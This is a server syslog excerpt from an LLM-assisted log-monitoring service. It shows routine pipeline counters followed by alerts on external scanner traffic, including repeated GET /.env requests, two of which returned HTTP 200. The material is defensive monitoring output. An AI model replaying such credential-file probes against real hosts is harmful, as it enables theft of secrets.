Mar 20 04:53:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 04:53:01.951431 [observer] Pipeline: processed=1753 pattern_hits=1723 llm_calls=30 llm_errors=0 learned=0
Mar 20 04:53:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 04:53:01.951459 [observer] Patterns: hash=1723 prefix=0 regex=0 contains=0 deny=6 alert=5 suppress=0 misses=30
Mar 20 04:53:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 04:53:31.943127 [observer] Pipeline: processed=1755 pattern_hits=1725 llm_calls=30 llm_errors=0 learned=0
Mar 20 04:53:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 04:53:31.943181 [observer] Patterns: hash=1725 prefix=0 regex=0 contains=0 deny=6 alert=5 suppress=0 misses=30
Mar 20 04:54:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 04:54:01.946681 [observer] Pipeline: processed=1758 pattern_hits=1728 llm_calls=30 llm_errors=0 learned=0
Mar 20 04:54:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 04:54:01.946824 [observer] Patterns: hash=1728 prefix=0 regex=0 contains=0 deny=6 alert=5 suppress=0 misses=30
Mar 20 04:54:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 04:54:31.940499 [observer] Pipeline: processed=1761 pattern_hits=1731 llm_calls=30 llm_errors=0 learned=0
Mar 20 04:54:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 04:54:31.940525 [observer] Patterns: hash=1731 prefix=0 regex=0 contains=0 deny=6 alert=5 suppress=0 misses=30
Mar 20 04:55:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 04:55:01.943626 [observer] Pipeline: processed=1763 pattern_hits=1733 llm_calls=30 llm_errors=0 learned=0
Mar 20 04:55:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 04:55:01.943653 [observer] Patterns: hash=1733 prefix=0 regex=0 contains=0 deny=6 alert=5 suppress=0 misses=30
Mar 20 04:55:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 04:55:31.934795 [observer] Pipeline: processed=1767 pattern_hits=1737 llm_calls=30 llm_errors=0 learned=0
Mar 20 04:55:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 04:55:31.934823 [observer] Patterns: hash=1737 prefix=0 regex=0 contains=0 deny=6 alert=5 suppress=0 misses=30
Mar 20 04:56:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 04:56:01.953147 [observer] Pipeline: processed=1769 pattern_hits=1739 llm_calls=30 llm_errors=0 learned=0
Mar 20 04:56:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 04:56:01.953210 [observer] Patterns: hash=1739 prefix=0 regex=0 contains=0 deny=6 alert=5 suppress=0 misses=30
Mar 20 04:56:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 04:56:31.936742 [observer] Pipeline: processed=1773 pattern_hits=1743 llm_calls=30 llm_errors=0 learned=0
Mar 20 04:56:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 04:56:31.936770 [observer] Patterns: hash=1743 prefix=0 regex=0 contains=0 deny=6 alert=5 suppress=0 misses=30
Mar 20 04:57:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 04:57:01.939529 [observer] Pipeline: processed=1775 pattern_hits=1745 llm_calls=30 llm_errors=0 learned=0
Mar 20 04:57:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 04:57:01.939553 [observer] Patterns: hash=1745 prefix=0 regex=0 contains=0 deny=6 alert=5 suppress=0 misses=30
Mar 20 04:57:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 04:57:31.934194 [observer] Pipeline: processed=1780 pattern_hits=1750 llm_calls=30 llm_errors=0 learned=0
Mar 20 04:57:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 04:57:31.934215 [observer] Patterns: hash=1750 prefix=0 regex=0 contains=0 deny=6 alert=5 suppress=0 misses=30
Mar 20 04:58:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 04:58:01.940192 [observer] Pipeline: processed=1783 pattern_hits=1753 llm_calls=30 llm_errors=0 learned=0
Mar 20 04:58:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 04:58:01.943831 [observer] Patterns: hash=1753 prefix=0 regex=0 contains=0 deny=6 alert=5 suppress=0 misses=30
Mar 20 04:58:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 04:58:31.949933 [observer] Pipeline: processed=1785 pattern_hits=1755 llm_calls=30 llm_errors=0 learned=0
Mar 20 04:58:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 04:58:31.949962 [observer] Patterns: hash=1755 prefix=0 regex=0 contains=0 deny=6 alert=5 suppress=0 misses=30
Mar 20 04:59:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 04:59:01.950364 [observer] Pipeline: processed=1789 pattern_hits=1759 llm_calls=30 llm_errors=0 learned=0
Mar 20 04:59:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 04:59:01.950391 [observer] Patterns: hash=1759 prefix=0 regex=0 contains=0 deny=6 alert=5 suppress=0 misses=30
Mar 20 04:59:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 04:59:31.943329 [observer] Pipeline: processed=1791 pattern_hits=1761 llm_calls=30 llm_errors=0 learned=0
Mar 20 04:59:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 04:59:31.943352 [observer] Patterns: hash=1761 prefix=0 regex=0 contains=0 deny=6 alert=5 suppress=0 misses=30
Mar 20 05:00:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 05:00:01.938758 [observer] Pipeline: processed=1795 pattern_hits=1765 llm_calls=30 llm_errors=0 learned=0
Mar 20 05:00:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 05:00:01.938789 [observer] Patterns: hash=1765 prefix=0 regex=0 contains=0 deny=6 alert=5 suppress=0 misses=30
Mar 20 05:00:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 05:00:31.933603 [observer] Pipeline: processed=1797 pattern_hits=1767 llm_calls=30 llm_errors=0 learned=0
Mar 20 05:00:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 05:00:31.933625 [observer] Patterns: hash=1767 prefix=0 regex=0 contains=0 deny=6 alert=5 suppress=0 misses=30
Mar 20 05:01:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 05:01:01.953605 [observer] Pipeline: processed=1800 pattern_hits=1770 llm_calls=30 llm_errors=0 learned=0
Mar 20 05:01:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 05:01:01.953638 [observer] Patterns: hash=1770 prefix=0 regex=0 contains=0 deny=6 alert=5 suppress=0 misses=30
Mar 20 05:01:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 05:01:31.937346 [observer] Pipeline: processed=1803 pattern_hits=1773 llm_calls=30 llm_errors=0 learned=0
Mar 20 05:01:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 05:01:31.937369 [observer] Patterns: hash=1773 prefix=0 regex=0 contains=0 deny=6 alert=5 suppress=0 misses=30
Mar 20 05:02:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 05:02:01.960899 [observer] Pipeline: processed=1805 pattern_hits=1775 llm_calls=30 llm_errors=0 learned=0
Mar 20 05:02:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 05:02:01.961096 [observer] Patterns: hash=1775 prefix=0 regex=0 contains=0 deny=6 alert=5 suppress=0 misses=30
Mar 20 05:02:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 05:02:31.934748 [observer] Pipeline: processed=1811 pattern_hits=1781 llm_calls=30 llm_errors=0 learned=0
Mar 20 05:02:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 05:02:31.934772 [observer] Patterns: hash=1781 prefix=0 regex=0 contains=0 deny=6 alert=5 suppress=0 misses=30
Mar 20 05:03:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 05:03:01.962335 [observer] Pipeline: processed=1813 pattern_hits=1783 llm_calls=30 llm_errors=0 learned=0
Mar 20 05:03:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 05:03:01.962364 [observer] Patterns: hash=1783 prefix=0 regex=0 contains=0 deny=6 alert=5 suppress=0 misses=30
Mar 20 05:03:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 05:03:31.933885 [observer] Pipeline: processed=1817 pattern_hits=1787 llm_calls=30 llm_errors=0 learned=0
Mar 20 05:03:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 05:03:31.933910 [observer] Patterns: hash=1787 prefix=0 regex=0 contains=0 deny=6 alert=5 suppress=0 misses=30
Mar 20 05:04:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 05:04:01.949056 [observer] Pipeline: processed=1819 pattern_hits=1789 llm_calls=30 llm_errors=0 learned=0
Mar 20 05:04:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 05:04:01.949093 [observer] Patterns: hash=1789 prefix=0 regex=0 contains=0 deny=6 alert=5 suppress=0 misses=30
Mar 20 05:04:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 05:04:31.933824 [observer] Pipeline: processed=1822 pattern_hits=1792 llm_calls=30 llm_errors=0 learned=0
Mar 20 05:04:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 05:04:31.933847 [observer] Patterns: hash=1792 prefix=0 regex=0 contains=0 deny=6 alert=5 suppress=0 misses=30
Mar 20 05:05:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 05:05:01.939574 [observer] Pipeline: processed=1825 pattern_hits=1795 llm_calls=30 llm_errors=0 learned=0
Mar 20 05:05:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 05:05:01.939599 [observer] Patterns: hash=1795 prefix=0 regex=0 contains=0 deny=6 alert=5 suppress=0 misses=30
Mar 20 05:05:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 05:05:31.949959 [observer] Pipeline: processed=1827 pattern_hits=1797 llm_calls=30 llm_errors=0 learned=0
Mar 20 05:05:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 05:05:31.949988 [observer] Patterns: hash=1797 prefix=0 regex=0 contains=0 deny=6 alert=5 suppress=0 misses=30
Mar 20 05:06:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 05:06:01.975915 [observer] Pipeline: processed=1831 pattern_hits=1801 llm_calls=30 llm_errors=0 learned=0
Mar 20 05:06:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 05:06:01.975969 [observer] Patterns: hash=1801 prefix=0 regex=0 contains=0 deny=6 alert=5 suppress=0 misses=30
Mar 20 05:06:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 05:06:31.935045 [observer] Pipeline: processed=1833 pattern_hits=1803 llm_calls=30 llm_errors=0 learned=0
Mar 20 05:06:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 05:06:31.935070 [observer] Patterns: hash=1803 prefix=0 regex=0 contains=0 deny=6 alert=5 suppress=0 misses=30
Mar 20 05:07:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 05:07:01.950879 [observer] Pipeline: processed=1837 pattern_hits=1807 llm_calls=30 llm_errors=0 learned=0
Mar 20 05:07:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 05:07:01.950911 [observer] Patterns: hash=1807 prefix=0 regex=0 contains=0 deny=6 alert=5 suppress=0 misses=30
Mar 20 05:07:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 05:07:31.933830 [observer] Pipeline: processed=1839 pattern_hits=1809 llm_calls=30 llm_errors=0 learned=0
Mar 20 05:07:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 05:07:31.933854 [observer] Patterns: hash=1809 prefix=0 regex=0 contains=0 deny=6 alert=5 suppress=0 misses=30
Mar 20 05:08:02 ip-172-26-12-110 observer[1565011]: 2026/03/20 05:08:02.010882 [observer] Pipeline: processed=1844 pattern_hits=1814 llm_calls=30 llm_errors=0 learned=0
Mar 20 05:08:02 ip-172-26-12-110 observer[1565011]: 2026/03/20 05:08:02.010917 [observer] Patterns: hash=1814 prefix=0 regex=0 contains=0 deny=6 alert=5 suppress=0 misses=30
Mar 20 05:08:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 05:08:31.933648 [observer] Pipeline: processed=1847 pattern_hits=1817 llm_calls=30 llm_errors=0 learned=0
Mar 20 05:08:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 05:08:31.933675 [observer] Patterns: hash=1817 prefix=0 regex=0 contains=0 deny=6 alert=5 suppress=0 misses=30
Mar 20 05:09:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 05:09:01.961182 [observer] Pipeline: processed=1849 pattern_hits=1819 llm_calls=30 llm_errors=0 learned=0
Mar 20 05:09:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 05:09:01.961213 [observer] Patterns: hash=1819 prefix=0 regex=0 contains=0 deny=6 alert=5 suppress=0 misses=30
Mar 20 05:09:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 05:09:31.934735 [observer] Pipeline: processed=1853 pattern_hits=1823 llm_calls=30 llm_errors=0 learned=0
Mar 20 05:09:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 05:09:31.934763 [observer] Patterns: hash=1823 prefix=0 regex=0 contains=0 deny=6 alert=5 suppress=0 misses=30
Mar 20 05:10:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 05:10:01.976543 [observer] Pipeline: processed=1855 pattern_hits=1825 llm_calls=30 llm_errors=0 learned=0
Mar 20 05:10:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 05:10:01.976734 [observer] Patterns: hash=1825 prefix=0 regex=0 contains=0 deny=6 alert=5 suppress=0 misses=30
Mar 20 05:10:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 05:10:31.936704 [observer] Pipeline: processed=1859 pattern_hits=1829 llm_calls=30 llm_errors=0 learned=0
Mar 20 05:10:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 05:10:31.936725 [observer] Patterns: hash=1829 prefix=0 regex=0 contains=0 deny=6 alert=5 suppress=0 misses=30
Mar 20 05:11:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 05:11:01.946277 [observer] Pipeline: processed=1861 pattern_hits=1831 llm_calls=30 llm_errors=0 learned=0
Mar 20 05:11:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 05:11:01.946303 [observer] Patterns: hash=1831 prefix=0 regex=0 contains=0 deny=6 alert=5 suppress=0 misses=30
Mar 20 05:11:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 05:11:31.949999 [observer] Pipeline: processed=1863 pattern_hits=1833 llm_calls=30 llm_errors=0 learned=0
Mar 20 05:11:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 05:11:31.950024 [observer] Patterns: hash=1833 prefix=0 regex=0 contains=0 deny=6 alert=5 suppress=0 misses=30
Mar 20 05:12:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 05:12:01.944338 [observer] Pipeline: processed=1867 pattern_hits=1837 llm_calls=30 llm_errors=0 learned=0
Mar 20 05:12:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 05:12:01.944362 [observer] Patterns: hash=1837 prefix=0 regex=0 contains=0 deny=6 alert=5 suppress=0 misses=30
Mar 20 05:12:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 05:12:31.950517 [observer] Pipeline: processed=1869 pattern_hits=1839 llm_calls=30 llm_errors=0 learned=0
Mar 20 05:12:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 05:12:31.950542 [observer] Patterns: hash=1839 prefix=0 regex=0 contains=0 deny=6 alert=5 suppress=0 misses=30
Mar 20 05:13:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 05:13:01.942125 [observer] Pipeline: processed=1875 pattern_hits=1845 llm_calls=30 llm_errors=0 learned=0
Mar 20 05:13:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 05:13:01.942181 [observer] Patterns: hash=1845 prefix=0 regex=0 contains=0 deny=6 alert=5 suppress=0 misses=30
Mar 20 05:13:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 05:13:31.944068 [observer] Pipeline: processed=1877 pattern_hits=1847 llm_calls=30 llm_errors=0 learned=0
Mar 20 05:13:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 05:13:31.944098 [observer] Patterns: hash=1847 prefix=0 regex=0 contains=0 deny=6 alert=5 suppress=0 misses=30
Mar 20 05:14:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 05:14:01.938853 [observer] Pipeline: processed=1881 pattern_hits=1851 llm_calls=30 llm_errors=0 learned=0
Mar 20 05:14:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 05:14:01.938879 [observer] Patterns: hash=1851 prefix=0 regex=0 contains=0 deny=6 alert=5 suppress=0 misses=30
Mar 20 05:14:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 05:14:31.939139 [observer] Pipeline: processed=1883 pattern_hits=1853 llm_calls=30 llm_errors=0 learned=0
Mar 20 05:14:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 05:14:31.939184 [observer] Patterns: hash=1853 prefix=0 regex=0 contains=0 deny=6 alert=5 suppress=0 misses=30
Mar 20 05:15:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 05:15:01.947620 [observer] Pipeline: processed=1887 pattern_hits=1856 llm_calls=31 llm_errors=0 learned=0
Mar 20 05:15:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 05:15:01.947648 [observer] Patterns: hash=1856 prefix=0 regex=0 contains=0 deny=6 alert=5 suppress=0 misses=31
Mar 20 05:15:03 ip-172-26-12-110 observer[1565011]: 2026/03/20 05:15:03.799120 [analyzer] LLM verdict for docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto: classification=safe confidence=0.92 action=allow pattern_type=prefix
Mar 20 05:15:03 ip-172-26-12-110 observer[1565011]: 2026/03/20 05:15:03.799203 [analyzer] Source hint mismatch: LLM says "http_server", actual is "captain-captain.1.oqvny8g95v3neveijmxdmdgto" — skipping pattern
Mar 20 05:15:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 05:15:31.934644 [observer] Pipeline: processed=1891 pattern_hits=1860 llm_calls=31 llm_errors=0 learned=0
Mar 20 05:15:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 05:15:31.934668 [observer] Patterns: hash=1860 prefix=0 regex=0 contains=0 deny=6 alert=5 suppress=0 misses=31
Mar 20 05:16:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 05:16:01.946987 [observer] Pipeline: processed=1893 pattern_hits=1862 llm_calls=31 llm_errors=0 learned=0
Mar 20 05:16:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 05:16:01.947012 [observer] Patterns: hash=1862 prefix=0 regex=0 contains=0 deny=6 alert=5 suppress=0 misses=31
Mar 20 05:16:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 05:16:31.936000 [observer] Pipeline: processed=1897 pattern_hits=1866 llm_calls=31 llm_errors=0 learned=0
Mar 20 05:16:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 05:16:31.936031 [observer] Patterns: hash=1866 prefix=0 regex=0 contains=0 deny=6 alert=5 suppress=0 misses=31
Mar 20 05:17:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 05:17:01.958587 [observer] Pipeline: processed=1899 pattern_hits=1868 llm_calls=31 llm_errors=0 learned=0
Mar 20 05:17:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 05:17:01.958624 [observer] Patterns: hash=1868 prefix=0 regex=0 contains=0 deny=6 alert=5 suppress=0 misses=31
Mar 20 05:17:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 05:17:31.933606 [observer] Pipeline: processed=1903 pattern_hits=1872 llm_calls=31 llm_errors=0 learned=0
Mar 20 05:17:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 05:17:31.933634 [observer] Patterns: hash=1872 prefix=0 regex=0 contains=0 deny=6 alert=5 suppress=0 misses=31
Mar 20 05:18:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 05:18:01.943028 [observer] Pipeline: processed=1907 pattern_hits=1876 llm_calls=31 llm_errors=0 learned=0
Mar 20 05:18:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 05:18:01.943066 [observer] Patterns: hash=1876 prefix=0 regex=0 contains=0 deny=6 alert=5 suppress=0 misses=31
Mar 20 05:18:21 ip-172-26-12-110 observer[1565011]: 2026/03/20 05:18:21.375003 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=Nginx/Docker access log shows an HTTP POST to root path with a 405 (method not allowed) from an external IP; may indicate probing or an unexpected client behavior. Line=2026-03-20T05:18:21.374722752Z 23.94.216.234 - - [20/Mar/2026:05:18:21 +0000] "test3.admin.kovicloud.com" "POST / HTTP/1.1" 405 150 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:1.9.5.20) Gecko/ Firefox/3.6...
Mar 20 05:18:21 ip-172-26-12-110 observer[1565011]: 2026/03/20 05:18:21.972434 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=Web request returns HTTP 405 (method not allowed) to an unexpected endpoint (POST /) from an external client; could be probing or misconfigured client, not definitively malicious. Line=2026-03-20T05:18:21.972112435Z 23.94.216.234 - - [20/Mar/2026:05:18:21 +0000] "test3.admin.kovicloud.com" "POST / HTTP/1.1" 405 552 "-" "Mozilla/5.0 (CentOS; Linux i686) AppleWebKit/537.36 (KHTML, lik...
Mar 20 05:18:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 05:18:31.934735 [observer] Pipeline: processed=1911 pattern_hits=1880 llm_calls=31 llm_errors=0 learned=0
Mar 20 05:18:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 05:18:31.934762 [observer] Patterns: hash=1880 prefix=0 regex=0 contains=0 deny=6 alert=7 suppress=0 misses=31
Mar 20 05:19:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 05:19:01.949485 [observer] Pipeline: processed=1915 pattern_hits=1884 llm_calls=31 llm_errors=0 learned=0
Mar 20 05:19:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 05:19:01.949514 [observer] Patterns: hash=1884 prefix=0 regex=0 contains=0 deny=6 alert=7 suppress=0 misses=31
Mar 20 05:19:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 05:19:31.948748 [observer] Pipeline: processed=1917 pattern_hits=1886 llm_calls=31 llm_errors=0 learned=0
Mar 20 05:19:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 05:19:31.948773 [observer] Patterns: hash=1886 prefix=0 regex=0 contains=0 deny=6 alert=7 suppress=0 misses=31
Mar 20 05:20:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 05:20:01.957755 [observer] Pipeline: processed=1921 pattern_hits=1890 llm_calls=31 llm_errors=0 learned=0
Mar 20 05:20:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 05:20:01.957816 [observer] Patterns: hash=1890 prefix=0 regex=0 contains=0 deny=6 alert=7 suppress=0 misses=31
Mar 20 05:20:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 05:20:31.934604 [observer] Pipeline: processed=1923 pattern_hits=1892 llm_calls=31 llm_errors=0 learned=0
Mar 20 05:20:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 05:20:31.934633 [observer] Patterns: hash=1892 prefix=0 regex=0 contains=0 deny=6 alert=7 suppress=0 misses=31
Mar 20 05:21:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 05:21:01.976681 [observer] Pipeline: processed=1927 pattern_hits=1896 llm_calls=31 llm_errors=0 learned=0
Mar 20 05:21:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 05:21:01.976726 [observer] Patterns: hash=1896 prefix=0 regex=0 contains=0 deny=6 alert=7 suppress=0 misses=31
Mar 20 05:21:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 05:21:31.942831 [observer] Pipeline: processed=1929 pattern_hits=1898 llm_calls=31 llm_errors=0 learned=0
Mar 20 05:21:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 05:21:31.942859 [observer] Patterns: hash=1898 prefix=0 regex=0 contains=0 deny=6 alert=7 suppress=0 misses=31
Mar 20 05:21:49 ip-172-26-12-110 observer[1565011]: 2026/03/20 05:21:49.610513 [analyzer] LLM verdict for docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo: classification=suspicious confidence=0.64 action=alert pattern_type=
Mar 20 05:21:49 ip-172-26-12-110 observer[1565011]: 2026/03/20 05:21:49.610555 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=Access to /.env is a common probe to discover sensitive environment configuration; the 302 response may indicate a redirect or misconfiguration but the pattern is indicative of a potential information disclosure probe. Line=2026-03-20T05:21:42.944206279Z 141.98.11.171 - - [20/Mar/2026:05:21:42 +0000] "media.admin.kovicloud.com" "GET /.env HTTP/1.1" 302 138 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36...
Mar 20 05:21:56 ip-172-26-12-110 observer[1565011]: 2026/03/20 05:21:56.978446 [analyzer] LLM verdict for docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo: classification=suspicious confidence=0.65 action=alert pattern_type=
Mar 20 05:21:56 ip-172-26-12-110 observer[1565011]: 2026/03/20 05:21:56.978479 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=Request to /.env may indicate probing for sensitive environment configuration. Line=2026-03-20T05:21:43.582350051Z 141.98.11.171 - - [20/Mar/2026:05:21:43 +0000] "media.admin.kovicloud.com" "GET /.env HTTP/1.1" 200 1309 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.3...
Mar 20 05:21:56 ip-172-26-12-110 observer[1565011]: 2026/03/20 05:21:56.978559 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=Request to /.env may indicate probing for sensitive environment configuration. Line=2026-03-20T05:21:43.742145299Z 141.98.11.171 - - [20/Mar/2026:05:21:43 +0000] "media.admin.kovicloud.com" "GET /.env HTTP/1.1" 200 1309 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.3...
Mar 20 05:22:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 05:22:01.947285 [observer] Pipeline: processed=1934 pattern_hits=1901 llm_calls=33 llm_errors=0 learned=0
Mar 20 05:22:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 05:22:01.947315 [observer] Patterns: hash=1901 prefix=0 regex=0 contains=0 deny=6 alert=8 suppress=0 misses=33
Mar 20 05:22:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 05:22:31.937855 [observer] Pipeline: processed=1938 pattern_hits=1905 llm_calls=33 llm_errors=0 learned=0
Mar 20 05:22:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 05:22:31.937882 [observer] Patterns: hash=1905 prefix=0 regex=0 contains=0 deny=6 alert=8 suppress=0 misses=33
Mar 20 05:23:02 ip-172-26-12-110 observer[1565011]: 2026/03/20 05:23:02.058112 [observer] Pipeline: processed=1942 pattern_hits=1909 llm_calls=33 llm_errors=0 learned=0
Mar 20 05:23:02 ip-172-26-12-110 observer[1565011]: 2026/03/20 05:23:02.058143 [observer] Patterns: hash=1909 prefix=0 regex=0 contains=0 deny=6 alert=8 suppress=0 misses=33
Mar 20 05:23:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 05:23:31.936081 [observer] Pipeline: processed=1946 pattern_hits=1913 llm_calls=33 llm_errors=0 learned=0
Mar 20 05:23:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 05:23:31.936112 [observer] Patterns: hash=1913 prefix=0 regex=0 contains=0 deny=6 alert=8 suppress=0 misses=33
Mar 20 05:24:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 05:24:01.955030 [observer] Pipeline: processed=1948 pattern_hits=1915 llm_calls=33 llm_errors=0 learned=0
Mar 20 05:24:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 05:24:01.955066 [observer] Patterns: hash=1915 prefix=0 regex=0 contains=0 deny=6 alert=8 suppress=0 misses=33
Mar 20 05:24:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 05:24:31.933917 [observer] Pipeline: processed=1952 pattern_hits=1919 llm_calls=33 llm_errors=0 learned=0
Mar 20 05:24:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 05:24:31.933938 [observer] Patterns: hash=1919 prefix=0 regex=0 contains=0 deny=6 alert=8 suppress=0 misses=33
Mar 20 05:25:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 05:25:01.947434 [observer] Pipeline: processed=1954 pattern_hits=1921 llm_calls=33 llm_errors=0 learned=0
Mar 20 05:25:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 05:25:01.947476 [observer] Patterns: hash=1921 prefix=0 regex=0 contains=0 deny=6 alert=8 suppress=0 misses=33
Mar 20 05:25:15 ip-172-26-12-110 observer[1565011]: 2026/03/20 05:25:15.217978 [analyzer] LLM verdict for docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo: classification=suspicious confidence=0.65 action=alert pattern_type=
Mar 20 05:25:15 ip-172-26-12-110 observer[1565011]: 2026/03/20 05:25:15.218037 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=HTTP 400 on root path from an unusual client string and highly variable user-agent indicates a possible probe or malformed request pattern typical of scanners. Line=2026-03-20T05:25:08.222494386Z 43.157.22.109 - - [20/Mar/2026:05:25:08 +0000] "54.200.221.0" "GET / HTTP/1.1" 400 248 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15...
